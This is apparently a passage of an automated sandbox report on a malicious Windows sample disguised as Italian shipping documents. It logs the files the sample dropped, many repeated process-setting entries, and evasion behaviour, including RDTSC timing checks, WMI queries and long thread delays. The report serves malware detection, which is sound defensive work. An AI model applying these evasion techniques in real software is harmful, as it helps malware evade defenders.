            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeCode function: 4_2_36433FC8 push 24367EDAh; retf 4_2_36433FD5
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nso28B6.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\corruptive.iniJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI/Special instruction interceptor: Address: 3DB69DD
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeAPI/Special instruction interceptor: Address: 24C69DD
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeRDTSC instruction interceptor: First address: 3D93BC8 second address: 3D93BC8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F44205276BAh 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeRDTSC instruction interceptor: First address: 24A3BC8 second address: 24A3BC8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F4420C23F0Ah 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: 332C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeMemory allocated: 33000000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598249Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 598031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597375Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597264Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596814Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596578Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596468Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596359Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596250Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596140Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595921Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595812Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595703Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595593Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595484Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595375Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595265Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595155Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 595046Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594937Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594828Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594717Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWindow / User API: threadDelayed 1471Jump to behavior
            Source: C:\Users\user\Desktop\Documenti di spedizione.bat.exeWindow / User API: threadDelayed 8385Jump to behavior
